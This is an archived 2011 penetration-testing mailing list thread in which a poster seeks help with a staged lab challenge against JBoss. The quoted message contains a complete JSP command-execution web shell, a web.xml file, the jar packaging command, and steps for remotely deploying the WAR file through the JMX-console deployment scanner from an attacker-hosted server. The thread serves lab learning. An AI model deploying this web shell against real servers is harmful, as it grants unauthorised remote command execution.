Penetration Testing mailing list archives
Re: breaking jboss with a browser? not happening
From: lazers <a.alii85 () gmail com>
Date: Fri, 21 Jan 2011 00:11:20 -0800 (PST)
yes i know about the different upload features of jboss and em currently exploiting the use of deployment scanners. Thank you for your help. Danux wrote:
Hint: check the upload features of Jboss. You can upload war files. Sent via BlackBerry from Danux Network -----Original Message----- From: lazers <a.alii85 () gmail com> Sender: listbounce () securityfocus com Date: Fri, 14 Jan 2011 12:02:57 To: <pen-test () securityfocus com> Subject: breaking jboss with a browser? not happening I have been given task to break into jboss application by my senior sec manager at my company. Its a hacking challenge staged in a test lab This is what i have been given. A web-access to jboss. Yes that pretty much it<3. He believes in less is more philosophy. With some get to start working info. I have been told that a vulnerability exists inthe application and its no 0 day exploit its an known vulnerability.It is set as an open-book challenge i can get help anywhere i like. So what i did so for? Yes i google ; but i also run a nessus scan and the scan brought me one HIGH vulnerability. Its has to do with the default Jboss installation using the JMX-Console. Its not a new vulnerability i was able to reach this conclusion as i start googling. This particular vulnerability is very popular; I was saying to myself that my problems are over and i would be break it into jboss in record time. But that has been largely un-true. Why? Well if it wasn't true i wouldn't be here. I did the following (in steps) attack vector: deployment scanner feature 1.confirmed the default installation (by accessing localhost:9090) in my case its 9090 not 8080 as in hacking literature. Probably this is because em using a new version (idk exact reason) 2.i wrote this jsp script(cmd.jsp) astold in sites. <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform"ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") +"<BR>"); Process p =Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> 3.next i create a web.xml file to be placed in WEB-INF folder <?xml version="1.0" ?> <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4"> <servlet> <servlet-name>Command</servlet-name> <jsp-file>/cmd.jsp</jsp-file> </servlet> </web-app> 4.I complied the file cmd.jsp by placing the web.xml file in WEB-INF folder jar cvf cmd.war WEB-INF cmd.jsp 5. I put this file in http-apache server. File cmd.war reside at htdocs folder. Can be accessed by url: mywebserver:80/cmd.war 6.i go back to jboss defualt page and navigate myself to jboss.deploymentpage. 7. in the addurl tab i enter path for my cmd.war file as http://mywebserver/cmd.war 8. next i goto victim webserver in attempt to access my uploaded application http://victim:9090/cmd/cmd.jsp 9. i get HTTP STATUS 404- /cmd/cmd.jsp my app is suppose to be hot deployed by the jboss; but this is not the case coz even after 10-20 times after u have access the file i get the same error page. I want to know what is the reason for the behavior. I know there exists other attack vector (e.g rmi and etc) but i want to stick to this until i don't figure out the reason for this failure of exploit. Em i compiling the .jsp file with incorrect syntax? do i need to have tomcat server installed instead? I read it on internet that there could be some problems in the jboss trying to get reverse shell on your web-server as jboss is it work in bind-shell mode only? I'm really clueless to what i happening i spent 12 works on this single attack vector but em not making head-ways. jboss gurus help me. thanks -- View this message in context: http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30674976.html Sent from the Penetration Testing mailing list archive at Nabble.com. ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
-- View this message in context: http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30726534.html Sent from the Penetration Testing mailing list archive at Nabble.com. ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
Current thread:
- breaking jboss with a browser? not happening lazers (Jan 18)
- Re: breaking jboss with a browser? not happening Robin Wood (Jan 18)
- Re: breaking jboss with a browser? not happening spdr (Jan 20)
- Re: breaking jboss with a browser? not happening danuxx (Jan 20)
- Re: breaking jboss with a browser? not happening lazers (Jan 23)
- Re: breaking jboss with a browser? not happening psiinon (Jan 20)
- Re: breaking jboss with a browser? not happening lazers (Jan 23)
- RE: breaking jboss with a browser? not happening Hembrow, Chris (Jan 20)
- Re: breaking jboss with a browser? not happening YGN Ethical Hacker Group (Jan 23)
- Re: breaking jboss with a browser? not happening Matt Gardenghi (Jan 23)
- RE: breaking jboss with a browser? not happening lazers (Jan 23)
- Re: breaking jboss with a browser? not happening lazers (Jan 23)
- Re: breaking jboss with a browser? not happening Robin Wood (Jan 18)